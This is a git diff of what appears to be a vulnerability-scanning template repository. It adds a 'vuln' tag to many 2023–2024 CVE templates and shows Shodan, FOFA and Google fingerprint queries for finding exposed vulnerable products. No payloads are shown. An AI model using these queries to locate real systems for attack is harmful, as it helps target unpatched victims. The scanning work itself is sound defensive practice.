raw: diff --git a/http/cves/2023/CVE-2023-52085.yaml b/http/cves/2023/CVE-2023-52085.yaml index c331dbc422c..780e41f69ad 100644 --- a/http/cves/2023/CVE-2023-52085.yaml +++ b/http/cves/2023/CVE-2023-52085.yaml @@ -28,7 +28,7 @@ info: - "title=\"Winter CMS\"" - title="winter cms" google-query: intitle:"winter cms" - tags: cve,cve2023,authenticated,lfi,wintercms + tags: cve,cve2023,authenticated,lfi,wintercms,vuln http: - raw: diff --git a/http/cves/2023/CVE-2023-5222.yaml b/http/cves/2023/CVE-2023-5222.yaml index df8a42fb65b..6e9aeba6f5d 100644 --- a/http/cves/2023/CVE-2023-5222.yaml +++ b/http/cves/2023/CVE-2023-5222.yaml @@ -29,7 +29,7 @@ info: fofa-query: title="Vitogate 300" vendor: viessmann product: vitogate_300_firmware - tags: cve,cve2023,viessmann,vitogate,default-login,vkev + tags: cve,cve2023,viessmann,vitogate,default-login,vkev,vuln http: - raw: diff --git a/http/cves/2023/CVE-2023-52251.yaml b/http/cves/2023/CVE-2023-52251.yaml index 9f012e47571..e614d82be33 100644 --- a/http/cves/2023/CVE-2023-52251.yaml +++ b/http/cves/2023/CVE-2023-52251.yaml @@ -25,7 +25,7 @@ info: product: ui framework: kafka fofa-query: icon_hash="-1477045616" - tags: cve,cve2023,rce,kafka,kafka-ui,packetstorm + tags: cve,cve2023,rce,kafka,kafka-ui,packetstorm,vuln http: - raw: diff --git a/http/cves/2023/CVE-2023-5244.yaml b/http/cves/2023/CVE-2023-5244.yaml index 28e1d8edef7..5c3531ef4ba 100644 --- a/http/cves/2023/CVE-2023-5244.yaml +++ b/http/cves/2023/CVE-2023-5244.yaml @@ -31,7 +31,7 @@ info: fofa-query: - body="microweber" - icon_hash=780351152 - tags: cve,cve2023,huntr,xss,microweber + tags: cve,cve2023,huntr,xss,microweber,vuln http: - method: GET diff --git a/http/cves/2023/CVE-2023-5360.yaml b/http/cves/2023/CVE-2023-5360.yaml index c9e69fa49fc..bcfedabdebe 100644 --- a/http/cves/2023/CVE-2023-5360.yaml +++ b/http/cves/2023/CVE-2023-5360.yaml @@ -30,7 +30,7 @@ info: shodan-query: http.html:/plugins/royal-elementor-addons/ fofa-query: body=/plugins/royal-elementor-addons/ publicwww-query: "/plugins/royal-elementor-addons/" - tags: wpscan,packetstorm,cve,cve2023,rce,wordpress,wp-plugin,wp,royal-elementor-addons,unauth,intrusive,vkev + tags: wpscan,packetstorm,cve,cve2023,rce,wordpress,wp-plugin,wp,royal-elementor-addons,unauth,intrusive,vkev,vuln variables: file: "{{to_lower(rand_text_alpha(5))}}" string: "CVE-2023-5360" diff --git a/http/cves/2023/CVE-2023-5375.yaml b/http/cves/2023/CVE-2023-5375.yaml index 38c19cbfa61..0deeb1cf70a 100644 --- a/http/cves/2023/CVE-2023-5375.yaml +++ b/http/cves/2023/CVE-2023-5375.yaml @@ -25,7 +25,7 @@ info: max-request: 1 vendor: mosparo product: mosparo - tags: cve2023,cve,huntr,mosparo,redirect + tags: cve2023,cve,huntr,mosparo,redirect,vuln http: - method: GET diff --git a/http/cves/2023/CVE-2023-5556.yaml b/http/cves/2023/CVE-2023-5556.yaml index 0af5e172eaa..3a78cc47335 100644 --- a/http/cves/2023/CVE-2023-5556.yaml +++ b/http/cves/2023/CVE-2023-5556.yaml @@ -26,7 +26,7 @@ info: product: on-premises_installation shodan-query: http.favicon.hash:1199592666 fofa-query: icon_hash=1199592666 - tags: cve,cve2023,xss,structurizr,oos,authenticated + tags: cve,cve2023,xss,structurizr,oos,authenticated,vuln variables: str: "{{randstr}}" diff --git a/http/cves/2023/CVE-2023-5558.yaml b/http/cves/2023/CVE-2023-5558.yaml index f53e9a66d41..5e74486ce65 100644 --- a/http/cves/2023/CVE-2023-5558.yaml +++ b/http/cves/2023/CVE-2023-5558.yaml @@ -26,7 +26,7 @@ info: vendor: thimpress product: learnpress framework: wordpress - tags: cve,cve2023,wp,wp-plugin,wordpress,learnpress,xss,authenticated + tags: cve,cve2023,wp,wp-plugin,wordpress,learnpress,xss,authenticated,vuln flow: http(1) && http(2) diff --git a/http/cves/2023/CVE-2023-5559.yaml b/http/cves/2023/CVE-2023-5559.yaml index 5c4a79e72e8..77f25a476e9 100644 --- a/http/cves/2023/CVE-2023-5559.yaml +++ b/http/cves/2023/CVE-2023-5559.yaml @@ -23,7 +23,7 @@ info: product: 10web_booster framework: wordpress publicwww-query: "/wp-content/plugins/tenweb-speed-optimizer" - tags: cve,cve2023,wordpress,wp-plugin,wp,10web,vkev,intrusive + tags: cve,cve2023,wordpress,wp-plugin,wp,10web,vkev,intrusive,vuln flow: http(1) && http(2) && http(3) diff --git a/http/cves/2023/CVE-2023-5561.yaml b/http/cves/2023/CVE-2023-5561.yaml index 873611830c2..3fc92a139a3 100644 --- a/http/cves/2023/CVE-2023-5561.yaml +++ b/http/cves/2023/CVE-2023-5561.yaml @@ -30,7 +30,7 @@ info: - cpe:"cpe:2.3:a:wordpress:wordpress" - http.component:"wordpress" fofa-query: body="oembed" && body="wp-" - tags: cve,cve2023,wpscan,disclosure,wp,wordpress,email,exposure + tags: cve,cve2023,wpscan,disclosure,wp,wordpress,email,exposure,vuln flow: http(1) && http(2) diff --git a/http/cves/2023/CVE-2023-5830.yaml b/http/cves/2023/CVE-2023-5830.yaml index 74f3a3645f0..6c1a22a45a8 100644 --- a/http/cves/2023/CVE-2023-5830.yaml +++ b/http/cves/2023/CVE-2023-5830.yaml @@ -32,7 +32,7 @@ info: - http.title:"document locator - webtools" fofa-query: title="document locator - webtools" google-query: intitle:"document locator - webtools" - tags: cve,cve2023,ssrf,unauth,columbiasoft,intrusive,webtools,documentlocator,vkev + tags: cve,cve2023,ssrf,unauth,columbiasoft,intrusive,webtools,documentlocator,vkev,vuln http: - raw: diff --git a/http/cves/2023/CVE-2023-5863.yaml b/http/cves/2023/CVE-2023-5863.yaml index 24350cb7370..89e3cd72b16 100644 --- a/http/cves/2023/CVE-2023-5863.yaml +++ b/http/cves/2023/CVE-2023-5863.yaml @@ -21,7 +21,7 @@ info: max-request: 1 shodan-query: http.html:"phpmyfaq" product: phpMyFAQ - tags: cve2023,cve,huntr,phpmyfaq,xss + tags: cve2023,cve,huntr,phpmyfaq,xss,vuln http: - raw: diff --git a/http/cves/2023/CVE-2023-5914.yaml b/http/cves/2023/CVE-2023-5914.yaml index b67bfe2b616..1ceb2348cbb 100644 --- a/http/cves/2023/CVE-2023-5914.yaml +++ b/http/cves/2023/CVE-2023-5914.yaml @@ -27,7 +27,7 @@ info: - html:"/Citrix/StoreWeb" - http.html:"/citrix/storeweb" fofa-query: body="/citrix/storeweb" - tags: cve,xss,citrix,storefront,cve2023,cloud,vkev + tags: cve,xss,citrix,storefront,cve2023,cloud,vkev,vuln http: - method: POST diff --git a/http/cves/2023/CVE-2023-5974.yaml b/http/cves/2023/CVE-2023-5974.yaml index 5cf88872a9a..9ace5d67cc0 100644 --- a/http/cves/2023/CVE-2023-5974.yaml +++ b/http/cves/2023/CVE-2023-5974.yaml @@ -22,7 +22,7 @@ info: vendor: wpb-show-core-project product: wpb-show-core fofa-query: body="wp-content/plugins/wpb-show-core/" - tags: cve,cve2023,wp,wordpress,wp-plugin,ssrf,wpb-show-core,oast + tags: cve,cve2023,wp,wordpress,wp-plugin,ssrf,wpb-show-core,oast,vuln flow: http(1) && http(2) diff --git a/http/cves/2023/CVE-2023-5991.yaml b/http/cves/2023/CVE-2023-5991.yaml index cb5d83f27d9..d33e884470e 100644 --- a/http/cves/2023/CVE-2023-5991.yaml +++ b/http/cves/2023/CVE-2023-5991.yaml @@ -27,7 +27,7 @@ info: shodan-query: http.html:/wp-content/plugins/motopress-hotel-booking fofa-query: body=/wp-content/plugins/motopress-hotel-booking publicwww-query: "/wp-content/plugins/motopress-hotel-booking" - tags: cve,cve2023,lfi,motopress-hotel-booking,wordpress,wp-plugin,wpscan,wp,motopress + tags: cve,cve2023,lfi,motopress-hotel-booking,wordpress,wp-plugin,wpscan,wp,motopress,vuln http: - method: GET diff --git a/http/cves/2023/CVE-2023-6000.yaml b/http/cves/2023/CVE-2023-6000.yaml index e62aafcb7b2..20c03291519 100644 --- a/http/cves/2023/CVE-2023-6000.yaml +++ b/http/cves/2023/CVE-2023-6000.yaml @@ -28,7 +28,7 @@ info: framework: wordpress fofa-query: body="/wp-content/plugins/popup-builder" publicwww-query: "/wp-content/plugins/popup-builder/" - tags: cve,cve2023,wordpress,wp-plugin,wp,wpscan,xss,stored,intrusive,vkev + tags: cve,cve2023,wordpress,wp-plugin,wp,wpscan,xss,stored,intrusive,vkev,vuln flow: http(1) && http(2) diff --git a/http/cves/2023/CVE-2023-6018.yaml b/http/cves/2023/CVE-2023-6018.yaml index ef6f5f308ab..fd86be508cb 100644 --- a/http/cves/2023/CVE-2023-6018.yaml +++ b/http/cves/2023/CVE-2023-6018.yaml @@ -27,7 +27,7 @@ info: - title="mlflow" - app="mlflow" google-query: intitle:"mlflow" - tags: cve,cve2023,mlflow,oss,rce,intrusive,lfprojects + tags: cve,cve2023,mlflow,oss,rce,intrusive,lfprojects,vuln variables: model_name: "{{rand_text_alpha(6)}}" diff --git a/http/cves/2023/CVE-2023-6020.yaml b/http/cves/2023/CVE-2023-6020.yaml index 2ee9029eddd..07e06d3d6dc 100644 --- a/http/cves/2023/CVE-2023-6020.yaml +++ b/http/cves/2023/CVE-2023-6020.yaml @@ -28,7 +28,7 @@ info: fofa-query: - body="ray dashboard" - icon_hash=463802404 - tags: cve2023,cve,lfi,ray,oos,ray_project + tags: cve2023,cve,lfi,ray,oos,ray_project,vuln http: - method: GET diff --git a/http/cves/2023/CVE-2023-6021.yaml b/http/cves/2023/CVE-2023-6021.yaml index 53b5c2c4afb..9ac5a2d1db6 100644 --- a/http/cves/2023/CVE-2023-6021.yaml +++ b/http/cves/2023/CVE-2023-6021.yaml @@ -29,7 +29,7 @@ info: fofa-query: - body="ray dashboard" - icon_hash=463802404 - tags: cve,cve2023,lfi,ray,oos,ray_project + tags: cve,cve2023,lfi,ray,oos,ray_project,vuln http: - method: GET diff --git a/http/cves/2023/CVE-2023-6023.yaml b/http/cves/2023/CVE-2023-6023.yaml index 3abe7bffbb3..6d7d1301ed5 100644 --- a/http/cves/2023/CVE-2023-6023.yaml +++ b/http/cves/2023/CVE-2023-6023.yaml @@ -33,7 +33,7 @@ info: - title="verta ai" google-query: intitle:"verta ai" zoomeye-query: title="Verta AI" - tags: cve,cve2023,lfi,modeldb,vertaai,vkev + tags: cve,cve2023,lfi,modeldb,vertaai,vkev,vuln http: - method: GET diff --git a/http/cves/2023/CVE-2023-6038.yaml b/http/cves/2023/CVE-2023-6038.yaml index a0dc293f504..cd9fa8181fb 100644 --- a/http/cves/2023/CVE-2023-6038.yaml +++ b/http/cves/2023/CVE-2023-6038.yaml @@ -28,7 +28,7 @@ info: - http.title:"h2o flow" fofa-query: title="h2o flow" google-query: intitle:"h2o flow" - tags: cve,cve2023,h2o-3,h2o,ml,vkev + tags: cve,cve2023,h2o-3,h2o,ml,vkev,vuln http: - raw: diff --git a/http/cves/2023/CVE-2023-6063.yaml b/http/cves/2023/CVE-2023-6063.yaml index 568d11af1da..c21a85f66ea 100644 --- a/http/cves/2023/CVE-2023-6063.yaml +++ b/http/cves/2023/CVE-2023-6063.yaml @@ -29,7 +29,7 @@ info: shodan-query: "http.html:/wp-content/plugins/wp-fastest-cache/" fofa-query: "body=/wp-content/plugins/wp-fastest-cache/" publicwww-query: "/wp-content/plugins/wp-fastest-cache/" - tags: time-based-sqli,cve,cve2023,wp-fastest-cache,wpscan,wordpress,wp-plugin,sqli,wpfastestcache + tags: time-based-sqli,cve,cve2023,wp-fastest-cache,wpscan,wordpress,wp-plugin,sqli,wpfastestcache,vuln flow: | if (http(1)) { for (let i = 0; i < 2; i++) { diff --git a/http/cves/2023/CVE-2023-6065.yaml b/http/cves/2023/CVE-2023-6065.yaml index 7ca3796b28c..1896dbfadc3 100644 --- a/http/cves/2023/CVE-2023-6065.yaml +++ b/http/cves/2023/CVE-2023-6065.yaml @@ -24,7 +24,7 @@ info: vendor: quttera product: quttera_web_malware_scanner framework: wordpress - tags: cve,cve2023,wp-plugin,quttera,wpscan,wordpress + tags: cve,cve2023,wp-plugin,quttera,wpscan,wordpress,vuln http: - method: GET diff --git a/http/cves/2023/CVE-2023-6114.yaml b/http/cves/2023/CVE-2023-6114.yaml index ded790cc682..c067887d38a 100644 --- a/http/cves/2023/CVE-2023-6114.yaml +++ b/http/cves/2023/CVE-2023-6114.yaml @@ -26,7 +26,7 @@ info: product: duplicator framework: wordpress google-query: inurl:"/wp-content/plugins/duplicator" - tags: cve,cve2023,duplicator,duplicator-pro,lfi,wpscan,wordpress,wp-plugin,wp,awesomemotive,vkev + tags: cve,cve2023,duplicator,duplicator-pro,lfi,wpscan,wordpress,wp-plugin,wp,awesomemotive,vkev,vuln http: - method: GET diff --git a/http/cves/2023/CVE-2023-6275.yaml b/http/cves/2023/CVE-2023-6275.yaml index 521702c23b5..8d30d296325 100644 --- a/http/cves/2023/CVE-2023-6275.yaml +++ b/http/cves/2023/CVE-2023-6275.yaml @@ -24,7 +24,7 @@ info: vendor: totvs product: fluig fofa-query: app="TOTVS-Fluig" - tags: cve,cve2023,xss,fluig + tags: cve,cve2023,xss,fluig,vuln http: - method: GET diff --git a/http/cves/2023/CVE-2023-6329.yaml b/http/cves/2023/CVE-2023-6329.yaml index a9f89567ac8..3f92d84479d 100644 --- a/http/cves/2023/CVE-2023-6329.yaml +++ b/http/cves/2023/CVE-2023-6329.yaml @@ -24,7 +24,7 @@ info: vendor: controlid product: idsecure fofa-query: body="iDSecure" - tags: cve,cve2023,auth-bypass,idsecure,control-id,intrusive + tags: cve,cve2023,auth-bypass,idsecure,control-id,intrusive,vuln variables: username: "{{rand_base(8)}}" diff --git a/http/cves/2023/CVE-2023-6360.yaml b/http/cves/2023/CVE-2023-6360.yaml index 7c9c538024a..c09958425ff 100644 --- a/http/cves/2023/CVE-2023-6360.yaml +++ b/http/cves/2023/CVE-2023-6360.yaml @@ -30,7 +30,7 @@ info: product: my_calendar framework: wordpress fofa-query: '"wordpress" && body="wp-content/plugins/my-calendar"' - tags: cve,cve2023,sqli,wp,wordpress,wpscan,wp-plugin,my-calendar,joedolson + tags: cve,cve2023,sqli,wp,wordpress,wpscan,wp-plugin,my-calendar,joedolson,vuln flow: http(1) && http(2) diff --git a/http/cves/2023/CVE-2023-6379.yaml b/http/cves/2023/CVE-2023-6379.yaml index 16e21d06b43..3f7face71c3 100644 --- a/http/cves/2023/CVE-2023-6379.yaml +++ b/http/cves/2023/CVE-2023-6379.yaml @@ -34,7 +34,7 @@ info: - /opencms/ fofa-query: title="opencms" google-query: intitle:"opencms" - tags: cve2023,cve,opencms,xss,alkacon + tags: cve2023,cve,opencms,xss,alkacon,vuln http: - method: GET diff --git a/http/cves/2023/CVE-2023-6380.yaml b/http/cves/2023/CVE-2023-6380.yaml index e40f43f3052..132348f22b5 100644 --- a/http/cves/2023/CVE-2023-6380.yaml +++ b/http/cves/2023/CVE-2023-6380.yaml @@ -29,7 +29,7 @@ info: - cpe:"cpe:2.3:a:alkacon:opencms" fofa-query: title="opencms" google-query: intitle:"opencms" - tags: cve,cve2023,redirect,opencms,alkacon + tags: cve,cve2023,redirect,opencms,alkacon,vuln http: - method: GET diff --git a/http/cves/2023/CVE-2023-6389.yaml b/http/cves/2023/CVE-2023-6389.yaml index 7293d8e7044..bd7c4f1af6f 100644 --- a/http/cves/2023/CVE-2023-6389.yaml +++ b/http/cves/2023/CVE-2023-6389.yaml @@ -25,7 +25,7 @@ info: shodan-query: http.html:/wp-content/plugins/wordpress-toolbar/ fofa-query: body=/wp-content/plugins/wordpress-toolbar/ publicwww-query: "/wp-content/plugins/wordpress-toolbar/" - tags: wpscan,cve,cve2023,wordpress,wp-plugin,wordpress-toolbar,wp,redirect,abhinavsingh + tags: wpscan,cve,cve2023,wordpress,wp-plugin,wordpress-toolbar,wp,redirect,abhinavsingh,vuln http: - method: GET diff --git a/http/cves/2023/CVE-2023-6421.yaml b/http/cves/2023/CVE-2023-6421.yaml index 8af8a4a6d1f..efc9e200dd7 100644 --- a/http/cves/2023/CVE-2023-6421.yaml +++ b/http/cves/2023/CVE-2023-6421.yaml @@ -23,7 +23,7 @@ info: fofa-query: body="wp-content/plugins/download-manager/" google-query: inurl:"/wp-content/plugins/download-manager/" shodan-query: html:"wp-content/plugins/download-manager/" - tags: cve,cve2023,wp,wordpress,wp-plugin,exposure,download-manager + tags: cve,cve2023,wp,wordpress,wp-plugin,exposure,download-manager,vuln http: - raw: diff --git a/http/cves/2023/CVE-2023-6444.yaml b/http/cves/2023/CVE-2023-6444.yaml index 4358e9edd15..b5cc3a2dacd 100644 --- a/http/cves/2023/CVE-2023-6444.yaml +++ b/http/cves/2023/CVE-2023-6444.yaml @@ -25,7 +25,7 @@ info: product: seriously-simple-podcasting framework: wordpress publicwww-query: "/wp-content/plugins/seriously-simple-podcasting/" - tags: cve,cve2023,wordpress,wp-plugin,exposure,wp,seriously-simple-podcasting + tags: cve,cve2023,wordpress,wp-plugin,exposure,wp,seriously-simple-podcasting,vuln flow: http(1) && http(2) diff --git a/http/cves/2023/CVE-2023-6505.yaml b/http/cves/2023/CVE-2023-6505.yaml index 19cebaa2ed8..b32bdc51b91 100644 --- a/http/cves/2023/CVE-2023-6505.yaml +++ b/http/cves/2023/CVE-2023-6505.yaml @@ -25,7 +25,7 @@ info: product: prime_mover framework: wordpress fofa-query: body="/wp-content/plugins/prime-mover" - tags: cve,cve2023,wp,wp-plugin,wordpress,exposure,prime-mover,listing + tags: cve,cve2023,wp,wp-plugin,wordpress,exposure,prime-mover,listing,vuln http: - method: GET diff --git a/http/cves/2023/CVE-2023-6549.yaml b/http/cves/2023/CVE-2023-6549.yaml index 284d82cfca9..e2037217e42 100644 --- a/http/cves/2023/CVE-2023-6549.yaml +++ b/http/cves/2023/CVE-2023-6549.yaml @@ -25,7 +25,7 @@ info: vendor: citrix product: netscaler_gateway shodan-query: http.favicon.hash:-1292923998,-1166125415 - tags: cve,cve2023,citrix,netscaller,gateway,oob,kev,vkev + tags: cve,cve2023,citrix,netscaller,gateway,oob,kev,vkev,vuln http: - raw: diff --git a/http/cves/2023/CVE-2023-6553.yaml b/http/cves/2023/CVE-2023-6553.yaml index 94d4d07cee6..14401715155 100644 --- a/http/cves/2023/CVE-2023-6553.yaml +++ b/http/cves/2023/CVE-2023-6553.yaml @@ -28,7 +28,7 @@ info: fofa-query: body=/wp-content/plugins/backup-backup/ publicwww-query: /wp-content/plugins/backup-backup/ google-query: inurl:"/wp-content/plugins/backup-backup/" - tags: packetstorm,cve,cve2023,wp-plugin,rce,unauth,wordpress,wp,backupbliss,vkev + tags: packetstorm,cve,cve2023,wp-plugin,rce,unauth,wordpress,wp,backupbliss,vkev,vuln flow: http(1) && http(2) http: diff --git a/http/cves/2023/CVE-2023-6567.yaml b/http/cves/2023/CVE-2023-6567.yaml index 807818e3bbb..a374c4dba70 100644 --- a/http/cves/2023/CVE-2023-6567.yaml +++ b/http/cves/2023/CVE-2023-6567.yaml @@ -30,7 +30,7 @@ info: shodan-query: http.html:/wp-content/plugins/learnpress fofa-query: body=/wp-content/plugins/learnpress publicwww-query: "/wp-content/plugins/learnpress" - tags: time-based-sqli,wpscan,cve,cve2023,wp,wp-plugin,wordpress,learnpress,sqli,thimpress,vkev + tags: time-based-sqli,wpscan,cve,cve2023,wp,wp-plugin,wordpress,learnpress,sqli,thimpress,vkev,vuln http: - raw: diff --git a/http/cves/2023/CVE-2023-6568.yaml b/http/cves/2023/CVE-2023-6568.yaml index dfdde463f49..af83c143896 100644 --- a/http/cves/2023/CVE-2023-6568.yaml +++ b/http/cves/2023/CVE-2023-6568.yaml @@ -29,7 +29,7 @@ info: shodan-query: http.title:"mlflow" fofa-query: app="MLflow" google-query: intitle:"mlflow" - tags: cve,cve2023,mlflow,xss + tags: cve,cve2023,mlflow,xss,vuln http: - raw: diff --git a/http/cves/2023/CVE-2023-6623.yaml b/http/cves/2023/CVE-2023-6623.yaml index a523070614b..4b0e96d81e1 100644 --- a/http/cves/2023/CVE-2023-6623.yaml +++ b/http/cves/2023/CVE-2023-6623.yaml @@ -31,7 +31,7 @@ info: shodan-query: http.html:/wp-content/plugins/essential-blocks/ fofa-query: body=/wp-content/plugins/essential-blocks/ publicwww-query: "/wp-content/plugins/essential-blocks/" - tags: wpscan,cve,cve2023,wp,wp-plugin,wordpress,essential-blocks,lfi,wpdeveloper,vkev + tags: wpscan,cve,cve2023,wp,wp-plugin,wordpress,essential-blocks,lfi,wpdeveloper,vkev,vuln http: - method: GET diff --git a/http/cves/2023/CVE-2023-6634.yaml b/http/cves/2023/CVE-2023-6634.yaml index 165a6f48e0e..f697b14843c 100644 --- a/http/cves/2023/CVE-2023-6634.yaml +++ b/http/cves/2023/CVE-2023-6634.yaml @@ -30,7 +30,7 @@ info: shodan-query: http.html:/wp-content/plugins/learnpress fofa-query: body=/wp-content/plugins/learnpress publicwww-query: "/wp-content/plugins/learnpress" - tags: wpscan,cve,cve2023,wordpress,wp,wp-plugin,learnpress,rce,intrusive,thimpress,vkev + tags: wpscan,cve,cve2023,wordpress,wp,wp-plugin,learnpress,rce,intrusive,thimpress,vkev,vuln variables: oast: "{{interactsh-url}}/?" padstr: "{{randstr}}" diff --git a/http/cves/2023/CVE-2023-6655.yaml b/http/cves/2023/CVE-2023-6655.yaml index e0f2a4f3b40..4d09ea46863 100644 --- a/http/cves/2023/CVE-2023-6655.yaml +++ b/http/cves/2023/CVE-2023-6655.yaml @@ -22,7 +22,7 @@ info: vendor: hrp2000 product: e-hr fofa-query: title="人力资源信息管理系统" - tags: cve,cve2023,hjsoft,management-system,sqli,vkev + tags: cve,cve2023,hjsoft,management-system,sqli,vkev,vuln flow: http(1) && http(2) diff --git a/http/cves/2023/CVE-2023-6697.yaml b/http/cves/2023/CVE-2023-6697.yaml index 3c376356ae8..64c948b09c8 100644 --- a/http/cves/2023/CVE-2023-6697.yaml +++ b/http/cves/2023/CVE-2023-6697.yaml @@ -23,7 +23,7 @@ info: fofa-query: body="/wp-content/plugins/wp-google-maps" vendor: wpgmaps product: wp_go_maps - tags: cve,cve2023,wp,wp-plugin,wordpress,xss,wp-go-maps,authenticated + tags: cve,cve2023,wp,wp-plugin,wordpress,xss,wp-go-maps,authenticated,vuln http: - raw: diff --git a/http/cves/2023/CVE-2023-6786.yaml b/http/cves/2023/CVE-2023-6786.yaml index 6f46a814b7f..c02943f6fc4 100644 --- a/http/cves/2023/CVE-2023-6786.yaml +++ b/http/cves/2023/CVE-2023-6786.yaml @@ -19,7 +19,7 @@ info: max-request: 1 verified: true publicwww-query: "/wp-content/plugins/payment-gateway-for-telcell" - tags: cve,cve2023,wordpress,redirect,wp-plugin,wp,payment-gateway-for-telcell + tags: cve,cve2023,wordpress,redirect,wp-plugin,wp,payment-gateway-for-telcell,vuln http: - method: GET diff --git a/http/cves/2023/CVE-2023-6831.yaml b/http/cves/2023/CVE-2023-6831.yaml index 033b695e68e..3d5574acab7 100644 --- a/http/cves/2023/CVE-2023-6831.yaml +++ b/http/cves/2023/CVE-2023-6831.yaml @@ -30,7 +30,7 @@ info: - title="mlflow" - app="mlflow" google-query: intitle:"mlflow" - tags: cve,cve2023,mlflow,pathtraversal,lfprojects,intrusive + tags: cve,cve2023,mlflow,pathtraversal,lfprojects,intrusive,vuln http: - raw: diff --git a/http/cves/2023/CVE-2023-6875.yaml b/http/cves/2023/CVE-2023-6875.yaml index c45d9b67394..590fab22e67 100644 --- a/http/cves/2023/CVE-2023-6875.yaml +++ b/http/cves/2023/CVE-2023-6875.yaml @@ -30,7 +30,7 @@ info: shodan-query: http.html:/wp-content/plugins/post-smtp fofa-query: body=/wp-content/plugins/post-smtp publicwww-query: "/wp-content/plugins/post-smtp" - tags: cve,cve2023,wp,wp-plugin,wordpress,smtp,mailer,auth-bypass,wpexperts,vkev + tags: cve,cve2023,wp,wp-plugin,wordpress,smtp,mailer,auth-bypass,wpexperts,vkev,vuln variables: fcm_token: "{{randstr_1}}" device: "{{randstr_2}}" diff --git a/http/cves/2023/CVE-2023-6895.yaml b/http/cves/2023/CVE-2023-6895.yaml index 4002222db2d..5e1d6a691ba 100644 --- a/http/cves/2023/CVE-2023-6895.yaml +++ b/http/cves/2023/CVE-2023-6895.yaml @@ -27,7 +27,7 @@ info: product: intercom_broadcast_system shodan-query: http.favicon.hash:"-1830859634" fofa-query: "icon_hash=\"-1830859634\"" - tags: cve,cve2023,hikvision,rce + tags: cve,cve2023,hikvision,rce,vuln http: - method: POST diff --git a/http/cves/2023/CVE-2023-6909.yaml b/http/cves/2023/CVE-2023-6909.yaml index 8eff52cc398..802a22e753d 100644 --- a/http/cves/2023/CVE-2023-6909.yaml +++ b/http/cves/2023/CVE-2023-6909.yaml @@ -32,7 +32,7 @@ info: - title="mlflow" - app="mlflow" google-query: intitle:"mlflow" - tags: cve,cve2023,mlflow,lfi,intrusive,lfprojects + tags: cve,cve2023,mlflow,lfi,intrusive,lfprojects,vuln http: - raw: diff --git a/http/cves/2023/CVE-2023-6933.yaml b/http/cves/2023/CVE-2023-6933.yaml index 7c6c01b80a6..c623dbbf828 100644 --- a/http/cves/2023/CVE-2023-6933.yaml +++ b/http/cves/2023/CVE-2023-6933.yaml @@ -27,7 +27,7 @@ info: vendor: wpengine product: better_search_replace framework: wordpress - tags: cve,cve2023,wordpress,wp-plugin,wp,wpscan,better-search-replace,passive,vkev + tags: cve,cve2023,wordpress,wp-plugin,wp,wpscan,better-search-replace,passive,vkev,vuln http: - method: GET diff --git a/http/cves/2023/CVE-2023-6977.yaml b/http/cves/2023/CVE-2023-6977.yaml index 51abeb351dd..faad980f419 100644 --- a/http/cves/2023/CVE-2023-6977.yaml +++ b/http/cves/2023/CVE-2023-6977.yaml @@ -31,7 +31,7 @@ info: - title="mlflow" - app="mlflow" google-query: intitle:"mlflow" - tags: cve,cve2023,mlflow,oss,lfi,intrusive,lfprojects + tags: cve,cve2023,mlflow,oss,lfi,intrusive,lfprojects,vuln http: - raw: diff --git a/http/cves/2023/CVE-2023-6989.yaml b/http/cves/2023/CVE-2023-6989.yaml index 79417b25b43..36c91ccaf52 100644 --- a/http/cves/2023/CVE-2023-6989.yaml +++ b/http/cves/2023/CVE-2023-6989.yaml @@ -27,7 +27,7 @@ info: shodan-query: http.html:/wp-content/plugins/wp-simple-firewall fofa-query: body=/wp-content/plugins/wp-simple-firewall publicwww-query: "/wp-content/plugins/wp-simple-firewall" - tags: wpscan,cve,cve2023,wp,wordpress,wp-plugin,lfi,shield-security,getshieldsecurity + tags: wpscan,cve,cve2023,wp,wordpress,wp-plugin,lfi,shield-security,getshieldsecurity,vuln http: - raw: diff --git a/http/cves/2023/CVE-2023-7028.yaml b/http/cves/2023/CVE-2023-7028.yaml index 1c46dfb5683..63833309d80 100644 --- a/http/cves/2023/CVE-2023-7028.yaml +++ b/http/cves/2023/CVE-2023-7028.yaml @@ -31,7 +31,7 @@ info: - http.title:"gitlab" fofa-query: title="gitlab" google-query: intitle:"gitlab" - tags: hackerone,cve,cve2023,gitlab,auth-bypass,intrusive,kev,vkev + tags: hackerone,cve,cve2023,gitlab,auth-bypass,intrusive,kev,vkev,vuln flow: http(1) && http(2) http: diff --git a/http/cves/2023/CVE-2023-7116.yaml b/http/cves/2023/CVE-2023-7116.yaml index fe3dbf6dbab..621d2f3ad61 100644 --- a/http/cves/2023/CVE-2023-7116.yaml +++ b/http/cves/2023/CVE-2023-7116.yaml @@ -20,7 +20,7 @@ info: metadata: vendor: datax-web_project product: datax-web - tags: cve,cve2023,datax-web,oast,rce + tags: cve,cve2023,datax-web,oast,rce,vuln flow: http(1) && http(2) diff --git a/http/cves/2023/CVE-2023-7246.yaml b/http/cves/2023/CVE-2023-7246.yaml index 8c9caafafa5..cba4526a676 100644 --- a/http/cves/2023/CVE-2023-7246.yaml +++ b/http/cves/2023/CVE-2023-7246.yaml @@ -25,7 +25,7 @@ info: fofa-query: body="wp-content/plugins/system-dashboard/" google-query: inurl:"/wp-content/plugins/system-dashboard/" shodan-query: html:"wp-content/plugins/system-dashboard/" - tags: cve,cve2023,wp,wordpress,xss,wp-plugin,authenticated,system-dashboard + tags: cve,cve2023,wp,wordpress,xss,wp-plugin,authenticated,system-dashboard,vuln http: - raw: diff --git a/http/cves/2024/CVE-2024-0012.yaml b/http/cves/2024/CVE-2024-0012.yaml index 33f35c5d582..bad69e76773 100644 --- a/http/cves/2024/CVE-2024-0012.yaml +++ b/http/cves/2024/CVE-2024-0012.yaml @@ -27,7 +27,7 @@ info: shodan-query: - cpe:"cpe:2.3:o:paloaltonetworks:pan-os" - http.favicon.hash:"-631559155" - tags: cve,cve2024,paloalto,globalprotect,kev,vkev + tags: cve,cve2024,paloalto,globalprotect,kev,vkev,vuln http: - raw: diff --git a/http/cves/2024/CVE-2024-0195.yaml b/http/cves/2024/CVE-2024-0195.yaml index 8b8862d3ab5..84d026ef384 100644 --- a/http/cves/2024/CVE-2024-0195.yaml +++ b/http/cves/2024/CVE-2024-0195.yaml @@ -28,7 +28,7 @@ info: fofa-query: - "app=\"SpiderFlow\"" - app="spiderflow" - tags: cve,cve2024,spiderflow,crawler,unauth,rce,ssssssss + tags: cve,cve2024,spiderflow,crawler,unauth,rce,ssssssss,vuln flow: http(1) && http(2) http: diff --git a/http/cves/2024/CVE-2024-0200.yaml b/http/cves/2024/CVE-2024-0200.yaml index d1368157904..f7f5bba6e60 100644 --- a/http/cves/2024/CVE-2024-0200.yaml +++ b/http/cves/2024/CVE-2024-0200.yaml @@ 